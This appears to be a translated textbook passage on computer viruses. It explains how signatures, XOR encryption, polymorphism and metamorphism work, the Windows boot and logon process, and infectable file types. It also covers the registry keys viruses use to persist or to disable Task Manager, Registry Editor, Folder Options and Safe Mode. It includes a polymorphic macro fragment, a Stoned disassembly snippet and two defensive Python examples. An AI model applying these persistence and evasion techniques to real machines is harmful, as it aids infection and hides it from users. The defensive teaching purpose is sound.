20. Most anti-virus programs scan ordinary programs for virus patterns. Such a virus pattern is also called a virus signature. A signature is a sequence of hex codes representing a specific virus or virus family. (Sample pattern: B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8) If those patterns are found in a file, the anti-virus program informs the user that the file is infected, and the user can then delete the file if they wish. In that infection process it can be seen that the code has been modified. Self-modifying code was used in the early days of computing to save scarce memory, and around 1980 it was used in DOS games to conceal copy protection. Self-modifying viruses were created on the basis of those techniques. Self-modifying viruses can be classified into the following types:
(a) Simple self-modifying viruses. These viruses simply swap the subroutines within their code around, and therefore cause only minor problems.
(b) Encryption with a variable key. The virus is encrypted with an encryption key. It consists of a decryption module and an encrypted copy. In each infected file the virus is encrypted with a different combination of keys; the decryption module, however, stays unchanged. The virus cannot be detected directly by virus scanners using signatures, but the decryption module can be detected. The decryption method used is to XOR each byte with a random key that the main virus generates and stores.
(c) Polymorphic code viruses. This type of virus infects a file with encrypted polymorphic code that only its decryption module can decode. So that anti-virus programs cannot detect them, polymorphic viruses modify their code as they infect and replicate into files: they change the encryption module and the instruction sequence. Random number generation is used to achieve the polymorphism, and a mutation engine is needed to produce the polymorphic code. Mutators make it so that anti-virus software can only detect them by using the correct detection methods. Slow polymorphic code is also commonly used to keep anti-virus experts from understanding the code. An integrity checker is commonly used to check whether a polymorphic virus is present on the computer system. To detect polymorphic code viruses, anti-virus programs have to use emulators to decrypt the virus code, or else carefully examine the encrypted virus patterns. Some developers write polymorphic code into their programs to protect them from being cracked, and some anti-virus programs then wrongly flag those files as viruses.
'BsbK
Sub AuTOclOSE()
oN ERROr REsuMe NeXT
SHOWviSuAlBASIcEditOr = faLsE
If nmñGG > WYff Then
For XgfqLwDTT = 70 To 5
JhGPTT = 64
KjfLL = 34
If qqSsKWW < vMmm Then
For QpMM = 56 To 7
If qtWQHU = PCYKWvQQ Then
If lXYnNrr > mxTwjWW Then
End If
If FFnfrjj > GHgpE Then
End If
Figure (7) A polymorphic macro
(d) Metamorphic code viruses. Metamorphic viruses rewrite themselves in order to infect executable files afresh. This kind of virus is very complex and uses metamorphic engines to operate. The code the virus uses is transformed into a temporary form and afterwards regains its original code form. In this method the original algorithm is left unchanged, in order to evade pattern recognition by anti-virus software. Metamorphic code is more powerful than polymorphic code. This kind of virus contains complex, lengthy code. Well-known metamorphic viruses are Win32/Simile and Zmist. Win32/Simile is written in assembly language and contains over 14,000 lines of code, of which more than 90% belong to the metamorphic engine. Zmist, also known as Zombie.Mistfall, was the first virus to use code integration: it merges its own code into other code, then extracts the code again and rebuilds the executable files. These viruses can defeat emulator-based detection by anti-virus programs. A subsequent virus file produced by metamorphic techniques looks nothing like the original file. Metamorphic viruses can carry many viruses, and some metamorphic viruses can run on different operating systems. Figure (8) shows the successive changes in form of metamorphic viruses.
Figure (8) Metamorphic viruses whose form and size have diverged
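Added example (not from the original document) for the variable-key encryption and polymorphic-code passages above: a Python model of why a signature taken from the virus body stops matching once the body is stored XORed with a per-copy key, why the unchanging decryption routine can still be matched, how an emulation-style pass that undoes the XOR recovers the body signature, and how a CRC32 integrity check catches a same-size modification. The hex signature is the page's own sample pattern; the host bytes, the decryptor marker string and the padding are constructed placeholders, not real code.

```python
"""Signature scanning, XOR-encrypted bodies and integrity checks (added example)."""
import zlib

# Sample pattern quoted on the page (section 20); treated here as the body signature.
PAGE_SIGNATURE = bytes.fromhex(
    "B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 "
    "05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8")
# Constructed stand-ins: a fixed decryption routine (identical in every copy,
# so it can be signatured) and a body that contains the signature above.
DECRYPTOR_STUB = b"<constructed-decryptor-stub>"
BODY = PAGE_SIGNATURE + b"\x90" * 16
HOST = b"constructed host program bytes, not real code. " * 4
SIGNATURES = {"body": PAGE_SIGNATURE, "decryptor": DECRYPTOR_STUB}


def xor_bytes(data, key):
    """XOR every byte with one key byte (the decryption method the page describes)."""
    return bytes(b ^ key for b in data)


def encrypted_sample(key):
    """Layout of the constructed samples: host | stub | key byte | XORed body."""
    return HOST + DECRYPTOR_STUB + bytes([key]) + xor_bytes(BODY, key)


def scan(data, signatures=SIGNATURES):
    """Plain pattern scan: names of the signatures found verbatim in data."""
    return [name for name, sig in signatures.items() if sig in data]


def scan_with_decryption(data, signatures=SIGNATURES):
    """Static scan plus a minimal emulation step: when the fixed stub is found,
    read the key byte that follows it, undo the XOR on the rest and rescan."""
    hits = set(scan(data, signatures))
    pos = data.find(DECRYPTOR_STUB)
    if pos != -1:
        key_pos = pos + len(DECRYPTOR_STUB)
        hits.update(scan(xor_bytes(data[key_pos + 1:], data[key_pos]), signatures))
    return sorted(hits)


def crc32(data):
    return zlib.crc32(data) & 0xFFFFFFFF


def integrity_ok(baseline, data):
    """Integrity-checker view: compare against a CRC32 recorded while the file was clean."""
    return crc32(data) == baseline


# Two copies of the same body under different keys, and an in-place patch of the host.
SAMPLE_A = encrypted_sample(0x5A)
SAMPLE_B = encrypted_sample(0xC3)
PATCHED = HOST[:20] + b"#" * 8 + HOST[28:]    # same length as HOST, eight bytes changed
BASELINE = crc32(HOST)

if __name__ == "__main__":
    for label, image in (("A", SAMPLE_A), ("B", SAMPLE_B)):
        print(label, "static:", scan(image), "after decryption:", scan_with_decryption(image))
    print("patched, same size:", len(PATCHED) == len(HOST),
          "integrity ok:", integrity_ok(BASELINE, PATCHED))
```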
Chapter (3)
How a computer works
1. Because today's viruses not only infect but also carry out destructive actions and modify the computer's settings, a rough understanding of how a computer system works is needed in order to guard against the danger of virus damage. Only by clearly understanding how the operating system starts, the Windows Registry that viruses can alter and damage, and the file types that viruses chiefly attack can the nature of viruses be understood better.
Windows XP/2000/NT Startup Process
2. Viruses often damage the files needed for the computer system to start, so it is necessary to understand how the computer system starts and which files it uses. The operating systems released so far are Windows 95, Windows 98, Windows Me, Windows NT, Windows 2000, Windows XP, Windows Server 2003/2008/2012, Windows 7 and Windows 8. The different Mac OS and Linux OS also exist, but viruses spread very little on those systems. Among the Microsoft OSes, those most used today in offices, workplaces and on personal computers are Windows XP, Windows 7/8 and Windows Server.
3. In Windows 98 and Windows Me, the MS-DOS functions run first and only then is the Windows OS started. Windows NT and its descendants, Windows 2000 and Windows XP, work differently. In the Windows NT OSes the bootstrap process begins as in the earlier OSes, but the active partition's secondary loader determines whether the disk is formatted with FAT or NTFS and reads the ntldr file from the root directory of the boot partition.
4. ntldr looks for the boot.ini file. boot.ini contains a list from which an OS can be chosen, together with the options for how those Windows OSes should be started. Figure (9). boot.ini records where the Windows installations are located, and if there is more than one Windows, ntldr displays the list of Windows installations that can be used. boot.ini can be edited with the bootcfg command or with the System Configuration Utility (msconfig.exe). Although ntldr can boot DOS or non-NT versions of Windows, boot options for them cannot be entered in boot.ini.
Figure (9) System Configuration Utility (msconfig.exe)
5. If F8 is pressed while ntldr is displaying the boot menu, an Advanced Boot Menu appears. Figure (10). That menu contains advanced options such as booting in Safe Mode and booting with the last-used drivers. If MS-DOS, Windows 98 or Windows Me is chosen from the boot menu, ntldr reads a saved copy (bootsect.dos) of the boot sector that the earlier OS installed. The boot process of MS-DOS or Windows 98 starts from there.
Figure (10) Windows Advanced Options Menu
6. For Windows NT, Windows 2000 and Windows XP, ntldr runs the ntdetect.com program. ntdetect.com gathers information about the installed hardware: it probes some hardware itself and obtains the rest from the tables the BIOS left in memory. If several hardware profiles are to be loaded, ntldr pauses at that point and displays the Hardware Profiles/Configuration Recovery menu. ntldr stores the information it has detected in the Windows Registry under the HKLM\Hardware\Description key. ntldr then looks for the ntoskrnl.exe and hal.dll files in the System32 folder; those two files make up the Windows kernel. If those files are missing, the message "Windows could not start because the following file was missing or corrupt" appears.
Windows NT Kernel
7. Windows NT, Windows 2000 and Windows XP are built on a kernel (ntoskrnl.exe), which is the most fundamental service: it accesses the hardware, starts and stops processes, controls the CPU and manages memory. The kernel's Hardware Abstraction Layer (HAL) handles the differences between motherboard and CPU designs and carries out the hardware-management functions for the kernel and the Windows components one level above it. On an ordinary computer the HAL file is hal.dll. (On systems that use Physical Address Extension (PAE), the kernel image is ntoskrnlpa.exe instead of ntoskrnl.exe.)
8. The NT kernel is not actually Windows. The Graphical User Interface (GUI) and Windows sit above the kernel and are implemented by the 32-bit Windows (Win32) subsystem. The NT kernel can also be used by UNIX and OS/2. After the kernel and HAL have been loaded into memory, ntldr looks up the component files in the Registry and loads them. Depending on the choice made in the boot menu, ntldr checks the HKEY_LOCAL_MACHINE\System\Select\Current or HKEY_LOCAL_MACHINE\System\Select\LastKnownGood value and creates the HKEY_LOCAL_MACHINE\System\CurrentControlSet key. Then, if there are several hardware profiles, it checks the HKEY_LOCAL_MACHINE\System\CurrentControlSet\Hardware Profiles key.
9. After checking the hardware profiles, ntldr examines whether the Type value under each entry key of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services is 1; a value of 1 indicates a kernel-level device driver. ntldr loads the drivers marked to start at boot time. At that point the Windows kernel stage is complete.
10. The kernel has two initial phases. The first phase starts the minimum set of required services: the HAL, the Memory Manager, the Object Manager, the Security Reference Manager and the Process Manager. Up to that point all that can be seen on the screen, from the BIOS until graphics mode is entered, is plain text and the Windows startup progress bar. The whole system is then re-checked and the startup process begins. Device drivers and filter drivers are loaded in their required order, and the System Manager Subsystem (SMSS) starts.
11. At boot time, SMSS does the following:
(a) Creates the environment variables under the HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment key.
(b) Starts the kernel-mode side of the Win32 subsystem (win32k.sys).
(c) Starts the user-mode side of the Win32 subsystem, the Client/Server Runtime Server Subsystem (csrss.exe). At that point the Windows startup screen is visible.
(d) Creates the virtual memory page files (HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management).
Note: Before it opens any files, smss.exe runs Autochk, which checks whether Windows was shut down cleanly and then checks all drives. The drives are checked by running chkdsk.exe; if you do not want the check, you can skip it by pressing any key within 10 seconds.
12. Finally, the Windows Logon Manager, winlogon.exe, starts and displays the Welcome Screen (or) the Logon Dialog. Figure (11).
Figure (11): Logon Dialog
Windows Logon Process (Winlogon)
13. Winlogon starts the Local Security Authority Subsystem Service (LSASS) and the Service Control Manager (SCM), and runs every service that is set to Automatic in Windows Services. The logon process is as follows:
(a) Winlogon calls the Graphical Identification and Authentication (GINA) component.
(b) GINA shows the logon prompt and the user presses the Secure Attention Sequence (Control + Alt + Delete). (Windows Server 2000/2003/2008)
(c) GINA displays the Logon Dialog.
(d) The credentials must be entered (User Name, Password and Domain).
(e) GINA sends the credentials back to Winlogon.
(f) Winlogon passes the credentials to LSASS, which decides which account database to use. (The account databases are the local SAM, the domain SAM and Active Directory.)
(g) LSASS enforces the local security policy by checking the user's permissions, creating audit trails and creating security tokens.
14. After the user has logged in successfully, Winlogon does the following:
(a) Updates the control sets. The LastKnownGood control set is updated again.
(b) Loads the user profile (ntuser.dat) found under Documents and Settings.
(c) Applies the Group Policy settings of the user and of the computer.
(d) Runs the shell program pointed to by the Shell value (REG_SZ) in HKLM\Software\Microsoft\Windows NT\CurrentVersion\IniFileMapping\system.ini\Boot. Normally that value is SYS:Microsoft\Windows NT\CurrentVersion\Winlogon, and the actions defined in HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon are carried out. The shell program used here is explorer.exe. Figure (12).
Figure (12): Settings defined in the registry for Winlogon
15. It then runs the programs defined in the following locations:
(a) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
(b) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
(c) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
(d) HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load
(e) HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run
(f) HKCU\Software\Microsoft\Windows\CurrentVersion\Run
(g) HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
(h) %ALLUSERSPROFILE%\Start Menu\Programs\Startup\ (used on Windows versions before Vista)
(i) %USERPROFILE%\Start Menu\Programs\Startup\ (used on Windows versions before Vista)
Windows Vista Startup Process
16. The boot process of Windows Vista, Windows Server 2008/2012 and Windows 7/8 differs from that of every older Windows built on the NT Kernel. First, when the computer is switched on, the BIOS (or) EFI is loaded. On a BIOS system the boot sector is read from the MBR and loads the Windows Boot Manager (BOOTMGR). BOOTMGR first looks for an active partition and then uses the information stored in the Boot Configuration Data (BCD) folder to load Windows. (On an EFI system, the Windows Boot Manager is an EFI application stored on the EFI partition.)
17. BOOTMGR reads the Boot Configuration Data and displays the menu from which the OS is selected. One difference from Windows NT is that the advanced boot menu is reached with the Space Bar rather than the F8 key. The Boot Configuration Data (BCD) is a firmware-independent database for the information used at boot time. BCD replaces the boot.ini that ntldr used, and it is read by BOOTMGR. To change the BCD, the command-line tool bcdedit.exe must be used. The BCD holds the menu entries that BOOTMGR displays, which are:
(a) An entry that boots Windows Vista by calling winload.exe.
(b) An entry that resumes a hibernated Windows Vista by calling winresume.exe.
(c) An entry that boots older Windows versions such as Windows NT through ntldr.
(d) An entry that loads and executes a Volume Boot Record.
18. The BCD can be edited easily with a third-party tool such as EasyBCD. BOOTMGR calls the OS boot loader, Winload.exe, which loads and runs the OS kernel (ntoskrnl.exe) and the device drivers. Winload.exe is similar in nature to ntldr.
File Types That Need Attention
19. Some file types on a computer system contain code the computer can execute, batch commands, scripts or macros, so viruses can infect and spread through them by adding to or modifying that code. The following file types can be infected and attacked by viruses and therefore deserve special attention:
(-) .386: Windows Enhanced Mode Driver. This file is executable code and can be infected by a virus.
(-) .ADE: Microsoft Access Project. The use of macros creates a weakness.
(-) .ADP: Microsoft Access Project. The use of macros creates a weakness.
(-) .ADT: Microsoft Access Project. The use of macros creates a weakness.
(-) .APP: Application file. Being application files, they contain executable code.
(-) .ASP: Active Server Page. Files of this type combine program code with HTML code.
(-) .BAS: Microsoft Visual Basic Class Module. Because they are programs, they contain executable code.
(-) .BAT: Batch file. These are text files containing system commands. A few file viruses target them, but they are not commonly seen viruses.
(-) .BIN: Binary file. They are paired with some program and perform all kinds of tasks.
(-) .BTM: 4DOS Batch To Memory batch file. Another type of batch file.
(-) .CHM: Compiled HTML Help file. The use of scripts creates a weakness.
(-) .CLA/CLASS: Java Class file. Because Java applets run in a sandbox, they are assumed to be isolated from the system. Nevertheless, an applet can deceive the user into believing it is running safely inside the sandbox.
(-) .CMD: Windows NT Command Script. These are NT batch files.
(-) .COM: Command (executable file). Any executable file can be infected.
(-) .CPL: Control Panel Extension. Similar to device drivers; therefore they contain executable code.
(-) .CRT: Security Certificate. This file type may carry code associated with it.
(-) .CSC: Core Script file. Being a script file type, it contains executable code.
(-) .CSS: Hypertext Cascading Style Sheet. Style sheets may contain executable code.
(-) .DLL: Dynamic Link Library. DLLs contain code and functions that can be exported to other applications.
(-) .DOC: Microsoft Word Document. Word documents may contain macros, which are small pieces of executable code. A great many viruses target macros.
(-) .DOT: Microsoft Word Document Template. Word templates may also contain macros.
(-) .DRV: Device Driver. A device driver is executable code.
(-) .EML/EMAIL: MS Outlook Express E-mail. E-mail messages may contain HTML and scripts. Very many viruses and worms target this file type.
(-) .EXE: Executable file. Any executable file can be infected.
(-) .FON: Font. Font files may contain executable code.
(-) .HLP: Help file. Help files may contain macros.
(-) .HTA: HTML Program. This file type may contain scripts.
(-) .HTM/HTML: Hypertext Markup Language. HTML files may contain scripts.
(-) .INF: Setup Information. The setup scripts can be altered to do unexpected things.
(-) .INI: Initialization file. This file type holds program options.
(-) .INS: Internet Naming Service. These files can be altered to change DNS information.
(-) .ISP: Internet Communication Settings. Contains connection settings for IIS. The settings can be altered to change the web server's functions.
(-) .JS/JSE: JavaScript. Being scripts, they contain executable code.
(-) .LIB: Library. In theory this file type can be infected; to date, however, no such file has been infected.
(-) .LNK: Link. These are links to files, folders and applications. A virus can turn one into a different link.
(-) .M: MATLAB. These files contain executable code. Only a few viruses target MATLAB files.
(-) .MDB: Microsoft Access Database/Application. Access files may contain macros.
(-) .MDE: Microsoft Access Database. Macros and scripts create security weaknesses.
(-) .MHT/MHTM/MHTML: MHTML Document. This is a collection of web pages, and web pages contain scripts that can be infected.
(-) .MP3: Audio file. Genuine music files cannot be infected, but .mp3 files may contain macro code that media players understand and can execute.
(-) .MSO: Math Script Object. Program files that connect to databases, so they contain executable code.
(-) .MSC: Microsoft Common Console Document. A snap-in for the Microsoft Management Console. The file can be altered to carry out other actions.
(-) .MSI: Microsoft Windows Installer Package. These files contain executable code.
(-) .MSP: Microsoft Windows Installer Patch. These files contain executable code.
(-) .MST: Microsoft Visual Test Source Files. They can alter the original program code.
(-) .OBJ: Relocatable Object Code. These are data files used by many kinds of programs.
(-) .OCX: Object Linking and Embedding (OLE) Control. Programs that can be downloaded from a web page.
(-) .OV?: Program File Overlay. Supplementary files that add functions to programs. Overlay files may be plain data files or files containing executable code.
(-) .PCD: Photo CD MS Compiled Script. The scripts create a security weakness.
(-) .PIF: MS-DOS Shortcut. A virus can change the program the shortcut points to.
(-) .PPT: Microsoft PowerPoint Presentation. PowerPoint presentations may contain macros.
(-) .PRC: Palm Pilot Resource file. Programs that run on PDAs.
(-) .REG: Registry Entries. These files change registry settings.
(-) .RTF: Rich Text Format. Because the files contain only text they are safe; however, binary objects can be embedded inside them.
(-) .SCR: Screen Saver/Script. Screen savers and scripts contain executable code.
(-) .SCT: Windows Script Component. Scripts can be infected.
(-) .SHB/SHS: Shell Scrap Object File. A scrap file may contain executable code.
(-) .SMM: Ami Pro Macro. Being macros, they can be infected.
(-) SOURCE: Source Code. Program files that source code viruses can infect. The file extensions may be .ASM, .C, .CPP, .PAS, .CS and so on.
(-) .SYS: System Device Driver. A device driver is executable code.
(-) .URL: Internet Shortcut. A virus can alter it to open an unintended website.
(-) .VB/VBE: VBScript file. Scripts can be infected.
(-) .VBS: Visual Basic Script. A script file may contain a virus (or) worm (or) Trojan.
(-) .VXD: Virtual Device Driver. A device driver is executable code.
(-) .WSC: Windows Script Component. Scripts can be infected.
(-) .WSF: Windows Script file. Scripts can be infected.
(-) .WSH: Windows Script Host Settings File. A virus can alter the settings to do unexpected things.
(-) .XL?: MS Excel file. Excel worksheets may contain macros.
Windows Registry
20. The Windows Registry is the file that collects the information about the hardware installed in the computer, the device drivers in use and the applications; to edit it, the registry database is opened with regedit.exe. On Windows versions before Windows 95, such editing meant editing Win.ini, System.ini and the other .ini files associated with applications. The Windows Registry's database files DEFAULT, SAM, SECURITY, SOFTWARE, SYSTEM and ntuser.dat are stored under the C:\Windows\System32 folder and cannot be modified and saved by any program other than regedit.exe. Editing them with some other third-party program is not possible while the Windows installation in use is running. Because editing registry settings is risky, a backup should be made and kept before any change.
21. To display and edit registry entries, the Registry Editor contains handle keys. They are HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, HKEY_USERS and HKEY_CURRENT_CONFIG. Figure (13).
Figure (13): Handle keys in the Registry Editor
22. HKEY_CLASSES_ROOT is a subset of HKEY_LOCAL_MACHINE and contains the classes and extensions of all software. HKEY_CURRENT_USER is a subset of HKEY_USERS and holds the details of the user currently logged on to Windows. HKEY_LOCAL_MACHINE contains all system-related settings. HKEY_USERS holds the settings of the users of the computer. HKEY_CURRENT_CONFIG is a subset of HKEY_LOCAL_MACHINE and contains the configuration the computer is currently running with. To give a more detailed understanding, some registry settings are presented below.
Running Programs at Windows Startup
23. In Windows, viruses edit their values into the startup locations so that they run as soon as the Welcome Screen appears after logon begins. Figure (14) shows the programs that run from HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. If the values are placed in RunOnce instead of Run, the program runs only once at Windows startup.
Figure (14): Programs run at Windows startup
Blocking Access to Registry Editor and Task Manager
24. Sometimes viruses block the Registry Editor from being opened, and block Task Manager from being called so as to hide that they are running as a task. To do this, as shown in Figure (15), they set the DisableRegistryTools and DisableTaskMgr DWORD values under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System to 1.
Figure (15): Registry values modified by a virus on Windows
Hiding Folder Options from the Control Panel
25. Viruses often hide as system files or hidden files so that they cannot be found by searching. On Windows, finding hidden files requires selecting "Show hidden files and folders" in Folder Options. Likewise, to hide their file extensions, viruses also change "Hide extensions for known file types". Folder Options is needed both to find the missing files and to change the extensions of files. To prevent such changes, viruses alter the NoFolderOptions value under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer. To hide file extensions they alter the HideFileExt value under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced. To hide files they alter the Hidden, SuperHidden and ShowSuperHidden values under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
Preventing Boot into Safe Mode
26. Viruses run at Windows startup together with Windows. If the computer is booted into Safe Mode, viruses that start after the Welcome Screen can no longer run, and some viruses can be eliminated this way. Because virus writers know this, the virus deletes the registry keys under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\. In this way it prevents entering Safe Mode by pressing F8 at boot time.
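As an added example (not code from the original document), the following Python script audits a regedit export for the startup locations listed in paragraph 15 and for the DisableRegistryTools, DisableTaskMgr, NoFolderOptions, HideFileExt, Hidden/ShowSuperHidden and SafeBoot changes described in paragraphs 23 to 26. The sample .reg text, the placeholder file paths in it and the function names are constructed; the meanings of the Hidden (2 = do not show) and ShowSuperHidden (0 = do not show) values are taken from standard Explorer behaviour.

```python
"""Audit a regedit .reg export for the autostart locations and the
Registry Editor / Task Manager / Folder Options / Safe Mode changes this
chapter describes.  Added example, not code from the original document;
the sample export at the bottom is constructed."""
import re
from typing import Dict, List

# Keys whose every value is a program started at logon (paragraph 15).
AUTOSTART_KEYS = [
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce",
]
# Under this key, Load and Run are value names rather than subkeys.
NT_WINDOWS_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows"
# (key, value name, the setting a virus wants, meaning) from paragraphs 24 and 25.
POLICY_FLAGS = [
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System",
     "DisableRegistryTools", 1, "Registry Editor blocked"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System",
     "DisableTaskMgr", 1, "Task Manager blocked"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer",
     "NoFolderOptions", 1, "Folder Options removed"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced",
     "HideFileExt", 1, "extensions of known file types hidden"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced",
     "Hidden", 2, "hidden files not shown (2 = do not show)"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced",
     "ShowSuperHidden", 0, "protected system files not shown"),
]
SAFEBOOT_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot"

# "name"=data or @=data (default value); name may contain escaped quotes.
VALUE_RE = re.compile(r'^(?:@|"((?:[^"\\]|\\.)*)")=(.*)$')


def parse_reg_export(text: str) -> Dict[str, Dict[str, object]]:
    """Parse [key] headers and "name"=dword:... / "name"="..." lines.
    Key paths are lower-cased because the registry is case-insensitive."""
    keys: Dict[str, Dict[str, object]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m is None or current is None:
            continue
        name = "@" if m.group(1) is None else m.group(1)
        data = m.group(2)
        if data.startswith("dword:"):
            keys[current][name] = int(data[len("dword:"):], 16)
        elif len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            keys[current][name] = re.sub(r"\\(.)", r"\1", data[1:-1])  # undo \\ and \"
        else:
            keys[current][name] = data  # hex(...) and other types are kept raw
    return keys


def audit(keys: Dict[str, Dict[str, object]]) -> Dict[str, List]:
    """Return what a responder should review: every autostart entry, each
    evasion flag set the way paragraphs 24-25 describe, and SafeBoot subkeys
    missing from an export that does include the SafeBoot parent key."""
    findings: Dict[str, List] = {"autostart": [], "policy": [], "safeboot": []}
    for key in AUTOSTART_KEYS:
        for name, data in keys.get(key.lower(), {}).items():
            findings["autostart"].append((key, name, data))
    nt_windows = keys.get(NT_WINDOWS_KEY.lower(), {})
    for name in ("Load", "Run"):
        if nt_windows.get(name):
            findings["autostart"].append((NT_WINDOWS_KEY, name, nt_windows[name]))
    for key, name, wanted, meaning in POLICY_FLAGS:
        if keys.get(key.lower(), {}).get(name) == wanted:
            findings["policy"].append(f"{name}={wanted}: {meaning}")
    if SAFEBOOT_KEY.lower() in keys:
        for sub in ("Minimal", "Network"):
            if f"{SAFEBOOT_KEY}\\{sub}".lower() not in keys:
                findings["safeboot"].append(sub)
    return findings


# Constructed sample export: one ordinary-looking and one placeholder Run
# entry, a Load value, all six evasion flags set, and a SafeBoot key whose
# Minimal and Network subkeys have been deleted.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"updater"="C:\\Users\\Public\\placeholder.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"Load"="C:\\Users\\Public\\placeholder.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
"DisableTaskMgr"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"HideFileExt"=dword:00000001
"Hidden"=dword:00000002
"ShowSuperHidden"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot]
"""

if __name__ == "__main__":
    for category, items in audit(parse_reg_export(SAMPLE_EXPORT)).items():
        print(category)
        for item in items:
            print("   ", item)
```

A real export written by regedit.exe is UTF-16 text, so read it with encoding="utf-16" before passing it to parse_reg_export.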
Chapter (4)
Famous Viruses and Worms
Introduction
1. The worst computer virus is the one that infects our own computers. Unfortunately, millions of us have suffered this misfortune and have lost hours, sometimes even days, cleaning, restoring and recovering computer systems because of computer viruses. Today, malware such as the Stuxnet worm (written to halt Iran's nuclear operations) or the Zeus and SpyEye Trojans (written to steal the victims' bank accounts) is created to attack precise targets. The destructive power of viruses and worms can fill hard drives, destroy files and slow networks, and it also causes technical, intellectual-property and psychological damage.
Technical Damage
2. Once a virus has been written and released, not even its author can control its spread. A virus moves from one system to another through the users who share and distribute software. A virus cannot predict its compatibility with operating systems; while spreading it may even land on computer systems that did not exist when the virus was created. It is therefore impossible to test whether a virus is compatible with the computer systems it reaches.
3. As viruses replicate their code they can consume a great deal of memory, CPU time and disk space. An example is the Internet worm released by a Carnegie-Mellon student. Although that worm was not created with destructive intent, its self-replication consumed many resources and slowed the network.
4. Because any computer virus can attach itself to the user's programs, programs that verify a file's checksum at run time will break and refuse to run the modified file. In this way the virus can carry out a damaging DoS (Denial of Service) attack.
Ethical and Intellectual Property Damage
5. Because viruses modify data without authorization, they cause damage both ethically and legally. If programs are modified, the copyright, the ownership and the technical support for the program can be lost.
Psychological Damage
6. Viruses can also cause psychological damage. An ordinary computer user does not understand how a computer works, and confusion and lack of knowledge make that user afraid. A virus (or) worm deprives computer users of control over their computers, creates disruption and undermines their self-confidence.
The Stoned Virus
7. Before the Internet, the first computer viruses spread through floppy disks. One of the earliest was Stoned, a boot sector virus from 1987. It displayed the message "Your Computer is now Stoned! LEGALIZE MARIJUANA!" and annoyed the users of infected computers. Many variants were written by copying it, and it opened the way to making existing virus code more infectious by upgrading it. The Michelangelo virus that appeared in 1990 and the Angelina virus that appeared in 1994 are members of the Stoned family.
8. When the computer boots from an infected disk, the Stoned virus stays resident in the computer's memory. If the computer then boots from a hard drive, the virus checks the hard drive's Master Boot Record and, if it is not already infected, infects it. When infecting a floppy disk, Stoned moves the Master Boot Record to sector 11 and places its own code in sector 0. When infecting a hard drive, it moves the Master Boot Record to side 0, cylinder 0, sector 7 and places its code at side 0, cylinder 0, sector 1. Stoned infects only 360 kB 5.25" floppies and hard drives. While Stoned is in memory it infects the Master Boot Records of floppies; it does not re-infect hard drives. Even if the Stoned virus is removed from the Master Boot Record, the copy in memory will not try to re-infect the hard drive. Although the virus was not intended to do any damage, because it moves the original boot sector to sector 11, any data stored in sector 11 is lost. On some DOS systems sector 11 is part of the File Allocation Table, so the virus corrupts the disk's FAT.
Stoned_Start:
; set data segment register
000000A1 33C0 xor ax,ax
000000A3 8ED8 mov ds,ax
; create a new stack
000000A5 FA cli
000000A6 8ED0 mov ss,ax
000000A8 BC007C mov sp,7C00h ;
000000AB FB sti
; store (patch) Segment:Offset value of Interrupt 13h
